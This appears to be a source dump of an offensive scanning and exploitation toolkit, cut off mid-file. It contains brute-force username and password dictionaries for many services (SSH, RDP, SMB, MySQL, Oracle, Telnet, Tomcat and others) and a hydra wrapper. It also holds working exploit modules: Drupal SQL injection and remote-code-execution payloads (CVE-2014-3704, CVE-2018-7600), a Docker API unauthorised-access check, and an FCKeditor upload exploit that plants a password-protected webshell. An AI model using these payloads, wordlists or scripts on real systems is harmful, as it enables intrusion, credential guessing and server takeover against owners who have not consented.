password 2 | 0 3 | 1 4 | 2 5 | 3 6 | 4 7 | 5 8 | 6 9 | 7 10 | 8 11 | 9 12 | 123 13 | 456 14 | 1234 15 | 123456 16 | 123456 17 | 1212 18 | 12345678 19 | 23456789 20 | 246 21 | 249 22 | 369 23 | 777 24 | 888 25 | 7878 26 | 8787 27 | 8888 28 | 518 29 | 911 30 | 1022 31 | 92072 32 | 111111 33 | 121212 34 | 123123 35 | 123456 36 | Sa 37 | sA 38 | SA 39 | a12345 40 | a1b2c3 41 | a1b2c3d4 42 | fgh@#$ 43 | qwe!@# 44 | aaa 45 | aaaaaa 46 | abby 47 | abc 48 | abc123 49 | ABC123 50 | abcd 51 | abcd1234 52 | abcde 53 | Abcdef 54 | abcdef 55 | -------------------------------------------------------------------------------- /bf_dicts/Microsoft_SQL_Server-user.txt: -------------------------------------------------------------------------------- 1 | sa 2 | probe 3 | repl_publisher 4 | repl_subscriber 5 | 
distributor_admin 6 | admin 7 | Administrator 8 | guest 9 | test 10 | root 11 | -------------------------------------------------------------------------------- /bf_dicts/MySQL-passwd.txt: -------------------------------------------------------------------------------- 1 | 123 2 | 123123 3 | 123456 4 | 12345678 5 | !@# 6 | !@#$%^ 7 | !@#$%^&* 8 | 111111 9 | 666666 10 | abc 11 | test 12 | 888888 13 | fgh@#$ 14 | qwe!@# 15 | 123321 16 | |+_)( 17 | Admin123 18 | 88888888 19 | 66666666 20 | 111111 21 | guest 22 | test123 23 | master 24 | admin 25 | root 26 | 11111111 27 | 000000 28 | 8888 29 | 6666 30 | 123!@# 31 | 00000000 32 | 1234567 33 | aaaaaa 34 | 654321 35 | 999999 36 | 222222 37 | password 38 | abcdefg 39 | woaini 40 | iloveyou 41 | exit 42 | 99999999 43 | 333333 44 | 444444 45 | 555555 46 | 999999 47 | 000000 48 | 00000000 49 | 6543210 50 | 111222 51 | asdfghjkl 52 | abc123 53 | 666888 54 | zzzzzz 55 | abcd1234 56 | Guest123 57 | 1234 58 | 12345 59 | ab 60 | abcd 61 | abcde 62 | abcdef 63 | abcdefg 64 | abcdefgh 65 | abcdefghi 66 | Admin123 67 | 123qwe 68 | qazwsx 69 | qweasd 70 | asdfjkl; 71 | `1234567890-= 72 | 1234567890-= 73 | !@#$%^&*()_+ 74 | ~!@#$%^&*()_+ 75 | -------------------------------------------------------------------------------- /bf_dicts/MySQL-user.txt: -------------------------------------------------------------------------------- 1 | root 2 | mysql 3 | test 4 | user 5 | guest 6 | -------------------------------------------------------------------------------- /bf_dicts/ORACLE-passwd.txt: -------------------------------------------------------------------------------- 1 | SYSTEM 2 | system 3 | 123456 4 | abc123 5 | xiaoming 6 | 12345678 7 | iloveyou 8 | admin 9 | qq123456 10 | taobao 11 | root 12 | wang1234 13 | MANAGER 14 | CHANGE_ON_INSTALL 15 | internal 16 | 123456 17 | 8888 18 | 888888 19 | 1234 20 | fgh@#$ 21 | qwe!@# 22 | -------------------------------------------------------------------------------- /bf_dicts/ORACLE-user.txt: 
-------------------------------------------------------------------------------- 1 | SYSTEM 2 | SYS 3 | DBSNMP 4 | SCOTT 5 | OUTLN 6 | MDSYS 7 | ORDSYS 8 | WKSYS 9 | OLAPDBA 10 | CTXSYS 11 | OLAPSYS 12 | ORDPLUGINS 13 | QS_CBADM 14 | demo 15 | ORACLE 16 | missys 17 | RMAN 18 | QS_OS 19 | QS_ES 20 | SH 21 | PM 22 | OE 23 | HR 24 | QS_WS 25 | QS 26 | QS_ADM 27 | QS_CS 28 | QS_CB 29 | -------------------------------------------------------------------------------- /bf_dicts/POP3-passwd.txt: -------------------------------------------------------------------------------- 1 | 123 2 | 123123 3 | 123456 4 | 12345678 5 | test 6 | xiaoming 7 | !@# 8 | !@#$%^ 9 | !@#$%^&* 10 | 111111 11 | 666666 12 | abc 13 | 888888 14 | qq123456 15 | taobao 16 | wang1234 17 | 123321 18 | |+_)( 19 | Admin123 20 | 88888888 21 | 66666666 22 | 111111 23 | guest 24 | test123 25 | master 26 | admin 27 | root 28 | 11111111 29 | 000000 30 | 8888 31 | 6666 32 | 123!@# 33 | 00000000 34 | 1234567 35 | aaaaaa 36 | 654321 37 | 999999 38 | 222222 39 | password 40 | abcdefg 41 | woaini 42 | iloveyou 43 | exit 44 | 99999999 45 | 333333 46 | 444444 47 | 555555 48 | 999999 49 | 000000 50 | 00000000 51 | 6543210 52 | 111222 53 | asdfghjkl 54 | abc123 55 | 666888 56 | zzzzzz 57 | abcd1234 58 | Guest123 59 | 1234 60 | 12345 61 | ab 62 | abcd 63 | abcde 64 | abcdef 65 | abcdefg 66 | abcdefgh 67 | abcdefghi 68 | Admin123 69 | 123qwe 70 | qazwsx 71 | qweasd 72 | asdfjkl; 73 | `1234567890-= 74 | 1234567890-= 75 | !@#$%^&*()_+ 76 | ~!@#$%^&*()_+ 77 | fgh@#$ 78 | -------------------------------------------------------------------------------- /bf_dicts/POP3-user.txt: -------------------------------------------------------------------------------- 1 | desc 2 | test@example.com 3 | root@example.com -------------------------------------------------------------------------------- /bf_dicts/RDP-passwd.txt: -------------------------------------------------------------------------------- 1 | 456852ASDwsx. 
2 | 3 | 123 4 | 123123 5 | 123456 6 | 12345678 7 | !@# 8 | !@#$%^ 9 | !@#$%^&* 10 | 111111 11 | 666666 12 | abc 13 | test 14 | 888888 15 | qwe!@# 16 | xiaoming 17 | qq123456 18 | taobao 19 | wang1234 20 | [level=3] 21 | 123321 22 | 1234 23 | |+_)( 24 | Admin123 25 | 88888888 26 | 66666666 27 | 111111 28 | guest 29 | test123 30 | master 31 | admin 32 | root 33 | 11111111 34 | 000000 35 | 8888 36 | 6666 37 | 123!@# 38 | 00000000 39 | 1234567 40 | aaaaaa 41 | 654321 42 | 999999 43 | 222222 44 | password 45 | abcdefg 46 | woaini 47 | iloveyou 48 | exit 49 | 99999999 50 | 333333 51 | 444444 52 | 555555 53 | 999999 54 | 000000 55 | 00000000 56 | 6543210 57 | 111222 58 | asdfghjkl 59 | abc123 60 | 666888 61 | zzzzzz 62 | abcd1234 63 | Guest123 64 | 1234 65 | 12345 66 | ab 67 | abcd 68 | abcde 69 | abcdef 70 | abcdefg 71 | abcdefgh 72 | abcdefghi 73 | Admin123 74 | 123qwe 75 | qazwsx 76 | qweasd 77 | asdfjkl; 78 | `1234567890-= 79 | 1234567890-= 80 | !@#$%^&*()_+ 81 | ~!@#$%^&*()_+ 82 | -------------------------------------------------------------------------------- /bf_dicts/RDP-user.txt: -------------------------------------------------------------------------------- 1 | Administrator 2 | Guest 3 | test 4 | administrator 5 | admin 6 | -------------------------------------------------------------------------------- /bf_dicts/SMB-passwd.txt: -------------------------------------------------------------------------------- 1 | 123 2 | 123123 3 | 123456 4 | 12345678 5 | !@# 6 | !@#$%^ 7 | !@#$%^&* 8 | 111111 9 | 666666 10 | abc 11 | test 12 | 888888 13 | qwe!@# 14 | xiaoming 15 | qq123456 16 | taobao 17 | wang1234 18 | 123321 19 | |+_)( 20 | Admin123 21 | 88888888 22 | 66666666 23 | 111111 24 | [level=4] 25 | guest 26 | test123 27 | master 28 | admin 29 | root 30 | 11111111 31 | 000000 32 | 8888 33 | 6666 34 | 123!@# 35 | 00000000 36 | 1234567 37 | aaaaaa 38 | 654321 39 | 999999 40 | 222222 41 | password 42 | abcdefg 43 | woaini 44 | iloveyou 45 | exit 46 | 99999999 47 | 
333333 48 | 444444 49 | 555555 50 | 999999 51 | 000000 52 | 00000000 53 | 6543210 54 | 111222 55 | asdfghjkl 56 | abc123 57 | 666888 58 | zzzzzz 59 | abcd1234 60 | Guest123 61 | 1234 62 | 12345 63 | ab 64 | abcd 65 | abcde 66 | abcdef 67 | abcdefg 68 | abcdefgh 69 | abcdefghi 70 | Admin123 71 | 123qwe 72 | qazwsx 73 | qweasd 74 | asdfjkl; 75 | `1234567890-= 76 | 1234567890-= 77 | !@#$%^&*()_+ 78 | ~!@#$%^&*()_+ 79 | -------------------------------------------------------------------------------- /bf_dicts/SMB-user.txt: -------------------------------------------------------------------------------- 1 | Administrator 2 | Guest 3 | test 4 | -------------------------------------------------------------------------------- /bf_dicts/SNMPpasswd.txt: -------------------------------------------------------------------------------- 1 | admin 2 | cisco 3 | netadmin 4 | private 5 | 1234 6 | root 7 | super 8 | router 9 | public 10 | pento 11 | password 12 | 123456 13 | sysadm 14 | default 15 | switch 16 | backdoor 17 | recovery 18 | secure 19 | anicust 20 | d.e.b.u.g 21 | ADTRAN 22 | installer 23 | surt 24 | NetICs 25 | adminttd 26 | D-Link 27 | tech 28 | private 29 | synnet 30 | adtran 31 | hello 32 | security 33 | guest 34 | smile 35 | support 36 | PASSWORD 37 | changeme2 38 | ascend 39 | netopia 40 | echo 41 | pass 42 | corecess 43 | Manager 44 | secret 45 | BRIDGE 46 | atc123 47 | Password 48 | superuser 49 | 123456 50 | emradmin 51 | 12345678 52 | 123qwe 53 | qwe123 54 | fgh@#$ 55 | -------------------------------------------------------------------------------- /bf_dicts/SSH-passwd.txt: -------------------------------------------------------------------------------- 1 | nsfocus123 2 | 123 3 | 123123 4 | 123456 5 | 12345678 6 | !@# 7 | !@#$%^ 8 | !@#$%^&* 9 | 111111 10 | 666666 11 | abc 12 | test 13 | 888888 14 | xiaoming 15 | qwe!@# 16 | 123321 17 | |+_)( 18 | qwe!@#123 19 | Admin123 20 | 88888888 21 | 66666666 22 | 111111 23 | guest 24 | test123 25 | master 26 | admin 
27 | root 28 | 11111111 29 | 000000 30 | 8888 31 | 6666 32 | 123!@# 33 | 00000000 34 | 1234567 35 | aaaaaa 36 | 654321 37 | 999999 38 | 222222 39 | password 40 | abcdefg 41 | woaini 42 | iloveyou 43 | qq123456 44 | taobao 45 | wang1234 46 | exit 47 | 99999999 48 | 333333 49 | 444444 50 | 555555 51 | 999999 52 | 000000 53 | 00000000 54 | 6543210 55 | 111222 56 | asdfghjkl 57 | abc123 58 | 666888 59 | zzzzzz 60 | abcd1234 61 | Guest123 62 | 1234 63 | 12345 64 | ab 65 | abcd 66 | abcde 67 | abcdef 68 | abcdefg 69 | abcdefgh 70 | abcdefghi 71 | Admin123 72 | 123qwe 73 | qazwsx 74 | qweasd 75 | asdfjkl; 76 | `1234567890-= 77 | 1234567890-= 78 | !@#$%^&*()_+ 79 | ~!@#$%^&*()_+ 80 | -------------------------------------------------------------------------------- /bf_dicts/SSH-user.txt: -------------------------------------------------------------------------------- 1 | root 2 | mysql 3 | oracle 4 | test 5 | user 6 | guest 7 | -------------------------------------------------------------------------------- /bf_dicts/SYBASE-passwd.txt: -------------------------------------------------------------------------------- 1 | abc123 2 | xiaoming 3 | iloveyou 4 | admin 5 | SQL 6 | dbopswd 7 | rdrpswd 8 | pkipasswd 9 | sybase 10 | fgh@#$ 11 | 123qwe 12 | 123456 13 | 12345678 14 | 123 15 | qq123456 16 | taobao 17 | wang1234 18 | -------------------------------------------------------------------------------- /bf_dicts/SYBASE-user.txt: -------------------------------------------------------------------------------- 1 | admin 2 | Mon_user 3 | Dba 4 | entldbdbo 5 | entldbreader 6 | jagadmin 7 | PlAdmin 8 | pkiuser 9 | PortalAdmin 10 | pso 11 | dbo 12 | probe 13 | sybmail 14 | test 15 | sa 16 | -------------------------------------------------------------------------------- /bf_dicts/TELNET-passwd.txt: -------------------------------------------------------------------------------- 1 | 123 2 | test 3 | admin 4 | cisco 5 | netadmin 6 | private 7 | 1234 8 | root 9 | super 10 | router 11 | 
public 12 | pento 13 | password 14 | 123456 15 | sysadm 16 | default 17 | qwe!@# 18 | switch 19 | backdoor 20 | recovery 21 | secure 22 | anicust 23 | d.e.b.u.g 24 | ADTRAN 25 | installer 26 | surt 27 | NetICs 28 | adminttd 29 | D-Link 30 | tech 31 | private 32 | synnet 33 | adtran 34 | hello 35 | security 36 | guest 37 | smile 38 | support 39 | PASSWORD 40 | changeme2 41 | ascend 42 | netopia 43 | echo 44 | pass 45 | corecess 46 | Manager 47 | secret 48 | BRIDGE 49 | atc123 50 | Password 51 | superuser 52 | 123456 53 | emradmin 54 | 12345678 55 | 123321 56 | |+_)( 57 | Admin123 58 | 88888888 59 | 66666666 60 | 111111 61 | guest 62 | test123 63 | master 64 | admin 65 | root 66 | 11111111 67 | 000000 68 | 8888 69 | 6666 70 | 123!@# 71 | 00000000 72 | 1234567 73 | aaaaaa 74 | 654321 75 | 999999 76 | 222222 77 | password 78 | abcdefg 79 | woaini 80 | iloveyou 81 | exit 82 | 99999999 83 | 333333 84 | 444444 85 | 555555 86 | 999999 87 | 000000 88 | 00000000 89 | 6543210 90 | 111222 91 | asdfghjkl 92 | abc123 93 | 666888 94 | zzzzzz 95 | abcd1234 96 | Guest123 97 | 1234 98 | 12345 99 | ab 100 | abcd 101 | abcde 102 | abcdef 103 | abcdefg 104 | abcdefgh 105 | abcdefghi 106 | Admin123 107 | 123qwe 108 | qazwsx 109 | qweasd 110 | asdfjkl; 111 | `1234567890-= 112 | 1234567890-= 113 | !@#$%^&*()_+ 114 | ~!@#$%^&*()_+ 115 | qwe!@#123 116 | -------------------------------------------------------------------------------- /bf_dicts/TELNET-user.txt: -------------------------------------------------------------------------------- 1 | administrator 2 | root 3 | admin 4 | test 5 | guest 6 | -------------------------------------------------------------------------------- /bf_dicts/TOMCAT-passwd.txt: -------------------------------------------------------------------------------- 1 | admin 2 | tomcat 3 | 123 4 | 123456 5 | root 6 | fgh@#$ 7 | qwe!@# 8 | admin123 9 | admin123456 10 | -------------------------------------------------------------------------------- 
/bf_dicts/TOMCAT-user.txt: -------------------------------------------------------------------------------- 1 | admin 2 | tomcat 3 | both 4 | role1 5 | root 6 | -------------------------------------------------------------------------------- /bf_dicts/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- -------------------------------------------------------------------------------- /bf_dicts/bf.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import docker 3 | import os 4 | 5 | ''' 6 | hydra 7 | ''' 8 | 9 | 10 | def attack(service,ip,port): 11 | if service == 'ftp': 12 | os.chdir('bf_dicts') 13 | os.system(f'hydra -L FTP-user.txt -P FTP-passwd.txt -V -s {port} {ip} {service}') 14 | else: 15 | print('Service for -'+service+'- not support!') 16 | 17 | print(service,ip,port) 18 | 19 | 20 | 21 | 22 | if __name__ == "__main__": 23 | attack() 24 | -------------------------------------------------------------------------------- /bf_dicts/通用-常见口令列表.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1120362990/vulnerability-list/ef35be4029f4e7160e64d8339f9e43513a7fc40f/bf_dicts/通用-常见口令列表.txt -------------------------------------------------------------------------------- /bf_dicts/通用-常见用户名列表.txt: -------------------------------------------------------------------------------- 1 | Administrator 2 | root 3 | test 4 | system 5 | admin 6 | administrator 7 | guest 8 | ftp 9 | user 10 | guest 11 | sa 12 | manager 13 | lp 14 | sys 15 | adm 16 | -------------------------------------------------------------------------------- /docker_vuln/Main_docker.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import docker_vuln.docker_daemon_api 3 | 4 | 5 | def exec(URL): 6 | docker_vuln.docker_daemon_api.attack(URL) 7 | 8 
| 9 | if __name__ == "__main__": 10 | exec() 11 | -------------------------------------------------------------------------------- /docker_vuln/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | -------------------------------------------------------------------------------- /docker_vuln/docker_daemon_api.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import docker 3 | 4 | 5 | ''' 6 | Usage: 7 | moon.py -u docker_vuln http://127.0.0.1:2375 8 | 此漏洞默认存在2375端口上-nmap扫描结果- 2375/tcp open docker 9 | 贴一个漏洞介绍,可能拿shell:https://blog.csdn.net/qq_33020901/article/details/78685447 10 | ''' 11 | 12 | 13 | def attack(URL): 14 | print('[+]开始检测-Docker-docker_daemon_api未授权访问。[+]') 15 | try: 16 | client = docker.DockerClient(base_url=URL) 17 | 18 | print('获取到的容器列表:'+str(client.containers.list())) 19 | print('[+]存在漏洞,连接成功!!!') 20 | except Exception: 21 | print('[-]连接失败,漏洞不存在。') 22 | print('[+]检测完成-Docker-docker_daemon_api未授权访问。[+]') 23 | print('\n') 24 | 25 | 26 | if __name__ == "__main__": 27 | attack() 28 | -------------------------------------------------------------------------------- /durpal/CVE_2014_3704.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | from bs4 import BeautifulSoup 3 | import requests 4 | 5 | ''' 6 | Usage: 7 | moon.py -u drupal http://127.0.0.1:8080 8 | Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704) 9 | ''' 10 | 11 | 12 | def attack(URL): 13 | url = URL+'/?q=node&destination=node' 14 | print('[+]开始检测-Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)。[+]') 15 | 16 | user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 17 | Content_Type = "application/x-www-form-urlencoded" 18 | headers = {"User-Agent":user_agent,"Content-Type":Content_Type} 19 | 20 | data = 
'pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a' 21 | try: 22 | r = requests.post(url,data=data, headers=headers, verify=False) 23 | soup = BeautifulSoup(r.content,"lxml") 24 | print('请查看以下内容中是否有 用户名+@+IP 的注入结果:') 25 | print('--------------------') 26 | print(str(soup.find_all('li')[2])[100:135])#截取注入结果的那一段字符出来 27 | print('--------------------') 28 | except Exception: 29 | print('someerror!') 30 | print('[+]检测结束-Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)。[+]') 31 | print('\n') 32 | 33 | 34 | if __name__ == "__main__": 35 | attack() 36 | -------------------------------------------------------------------------------- /durpal/CVE_2018_7600.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import requests 3 | # https://github.com/a2u/CVE-2018-7600/blob/master/exploit.py 4 | 5 | ''' 6 | Usage: 7 | moon.py -u drupal http://127.0.0.1:8080 8 | Drupal Drupalgeddon 2远程代码执行漏洞(CVE-2018-7600) 9 | ''' 10 | 11 | 12 | def attack(URL): 13 | print('[+]开始检测-Drupal Drupalgeddon 2远程代码执行漏洞(CVE-2018-7600)。[+]') 14 | url = URL + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' 15 | payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "^w^" | tee hello.txt'} 16 | # print(url) 17 | try: 18 | r = requests.post(url, data=payload, verify=False) 19 | check = requests.get(URL + '/hello.txt', verify=False) 20 | if check.status_code != 200: 21 | sys.exit("Not exploitable") 22 | print('error!') 23 | print('可能存在漏洞-Check: ' + URL + '/hello.txt ^w^') 24 | except: 25 | print('someerroe!') 26 | print('[+]检测结束-Drupal Drupalgeddon 2远程代码执行漏洞(CVE-2018-7600)。[+]') 27 | print('\n') 28 | 29 | if __name__ == "__main__": 30 | attack() 31 | -------------------------------------------------------------------------------- 
/durpal/Main_durpal.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import os 3 | import durpal.CVE_2014_3704 4 | import durpal.CVE_2018_7600 5 | 6 | def exec(URL): 7 | durpal.CVE_2014_3704.attack(URL) 8 | durpal.CVE_2018_7600.attack(URL) 9 | 10 | 11 | 12 | 13 | if __name__ == "__main__": 14 | exec() 15 | -------------------------------------------------------------------------------- /durpal/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- -------------------------------------------------------------------------------- /fckeditor/Main_fckeditor.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import fckeditor.fckeditor_version 3 | import fckeditor.fckeditor_dangerfile 4 | import fckeditor.fckeditor_getshell 5 | 6 | 7 | def exec(URL): 8 | fckeditor.fckeditor_version.attack(URL) 9 | fckeditor.fckeditor_dangerfile.attack(URL) 10 | fckeditor.fckeditor_getshell.attack(URL) 11 | 12 | 13 | if __name__ == "__main__": 14 | exec() 15 | -------------------------------------------------------------------------------- /fckeditor/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- -------------------------------------------------------------------------------- /fckeditor/fckeditor_dangerfile.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import requests 3 | 4 | ''' 5 | Usage: 6 | moon.py -u fck http://127.0.0.1:8080 7 | ''' 8 | 9 | 10 | def attack(URL): 11 | urls = ( 12 | '/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/', 13 | '/FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp', 14 | 
'/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php', 15 | '/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp', 16 | '/FCKeditor/editor/filemanager/browser/default/connectors/test.html', 17 | '/FCKeditor/editor/filemanager/upload/test.html', 18 | '/FCKeditor/editor/filemanager/connectors/test.html', 19 | '/FCKeditor/editor/filemanager/connectors/uploadtest.html', 20 | '/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector', 21 | '/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/', 22 | '/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/', 23 | '/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/', 24 | '/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp', 25 | '/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/jsp/connector.jsp', 26 | '/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/php/connector.php', 27 | '/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php', 28 | '/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fjsp%2Fconnector.jsp', 29 | '/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fasp%2Fconnector.asp', 30 | '/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp', 31 | 
'/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp', 32 | '/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php', 33 | '/editor/filemanager/browser/default/connectors/test.html', 34 | '/editor/filemanager/upload/test.html', 35 | '/editor/filemanager/connectors/test.html', 36 | '/editor/filemanager/connectors/uploadtest.html', 37 | '/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector' 38 | ) 39 | 40 | print('[+]开始检测-Fckeditor敏感目录。[+]') 41 | user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 42 | headers = {"User-Agent":user_agent} 43 | for url in urls: 44 | url = URL + url 45 | try: 46 | verify_response = requests.get(url, headers=headers) 47 | if verify_response.status_code == 200: 48 | print('存在此页面:'+url) 49 | else: 50 | continue 51 | except Exception: 52 | print("Someerror!") 53 | print('[+]检测结束-Fckeditor敏感目录。[+]') 54 | print('\n') 55 | 56 | 57 | if __name__ == "__main__": 58 | attack() 59 | -------------------------------------------------------------------------------- /fckeditor/fckeditor_getshell.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | from requests_toolbelt.multipart.encoder import MultipartEncoder 3 | import requests 4 | import string 5 | from random import * 6 | import re 7 | import sys 8 | 9 | ''' 10 | Usage: 11 | moon.py -u fck http://127.0.0.1:8080 12 | fck <2.4.x版本(也就是2.4.x及以下)的File参数时为黑名单验证,可以通过上传.asa、.cer、.asp;jpg(针对IIS6)。 13 | 如果asa、cer不被解析,还可以传.asp[空格]。传的方法就是抓包然后在数据包里的文件名后填个空格。 14 | 实际测试过程中还是上传asa可以,以下脚本也基于asa上传 15 | fck编辑器如要上传文件需配置相关项目,如果出现上传成功且获取上传路径失败,就可能是配置不允许上传。 16 | 返回包出现这类文字基本上就是设置不允许上传:This connector is disabled. 
Please check the 17 | ''' 18 | 19 | 20 | def gen_shell(): 21 | min_char = 4 22 | max_char = 12 23 | allchar = string.ascii_letters + string.digits 24 | shell_name = "".join(choice(allchar) for x in range(randint(min_char, max_char))) 25 | return shell_name 26 | 27 | 28 | def geturl(URL): 29 | user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 30 | headers={"User-Agent":user_agent} 31 | 32 | urls = ( 33 | '/editor/filemanager/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/', #fck25 34 | '/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/', #fck243 35 | '/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=/',#fck21,#fck22,fck23 36 | ) 37 | for url in urls: 38 | url = URL + url 39 | try: 40 | verify_response = requests.get(url, headers=headers) 41 | html = verify_response.content.decode('utf-8') 42 | soup = re.search(r'', html) 43 | print("此Fckeditor上传路径为:" + soup.group(1)) 44 | return soup.group(1) 45 | break 46 | except Exception: 47 | pass 48 | 49 | 50 | def attack(URL): 51 | print('[+]开始检测-Fckeditor<=2.4版本简单文件上传。asp[+]') 52 | url = URL + '/editor/filemanager/browser/default/connectors/test.html' 53 | user_agent = "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36" 54 | headers = {"User-Agent": user_agent,"Upgrade-Insecure-Requests": "1"} 55 | verify_response = requests.get(url, headers=headers) 56 | shellname = gen_shell() 57 | if verify_response.status_code == 200: 58 | print('存在有风险的上传页面:'+url) 59 | try: 60 | url = URL + '/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=/' 61 | pwd = sys.argv[0] # 获取当前文件夹的路径 62 | m = MultipartEncoder(fields={'NewFile': (f'{shellname}.asa', open(f'{pwd}\\..\\fckeditor\\shell.asa', 
'rb'), 'application/octet-stream')}) 63 | headers={'Content-Type': m.content_type, 64 | 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36', 65 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 66 | 'Accept-Language':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3' 67 | } 68 | r = requests.post(url, data=m, headers=headers) 69 | print('上传shell成功!') 70 | try: 71 | aim_url = geturl(URL) 72 | URL = re.match('http://(.*?)/',URL).group() 73 | print('Shell地址为:'+URL + aim_url+shellname+'.asa') 74 | print('shell密码为:gutf987y97y97。') 75 | except Exception: 76 | print('获取上传路径失败,shell名为:'+shellname+'.asa') 77 | print('shell密码为:gutf987y97y97。') 78 | except Exception: 79 | print('上传shell发生错误。') 80 | else: 81 | print('未发现该页面:'+url) 82 | print('[+]检测结束-Fckeditor<=2.4版本简单文件上传。[+]') 83 | print('\n') 84 | 85 | 86 | if __name__ == "__main__": 87 | attack() 88 | -------------------------------------------------------------------------------- /fckeditor/fckeditor_version.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | from bs4 import BeautifulSoup 4 | import requests 5 | import re 6 | 7 | ''' 8 | Usage: 9 | moon.py -u fck http://127.0.0.1:8080 #此脚本需更新,效果较差 10 | 11 | ''' 12 | 13 | def attack(URL): 14 | #获取fck版本 15 | user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 16 | headers={"User-Agent":user_agent} 17 | url = URL + '/_whatsnew.html' 18 | try: 19 | verify_response = requests.get(url, headers=headers) 20 | html = verify_response.content 21 | soup = BeautifulSoup(html, "lxml") 22 | print("[+]此Fckeditor版本为:"+soup.h3.string.strip()) 23 | 24 | except : 25 | print("[-]获取Fckeditor版本错误!!") 26 | 27 | #获取fck文件上传路径,这里针对高版本有问题。得推倒从来 28 | urls = ( 29 | 
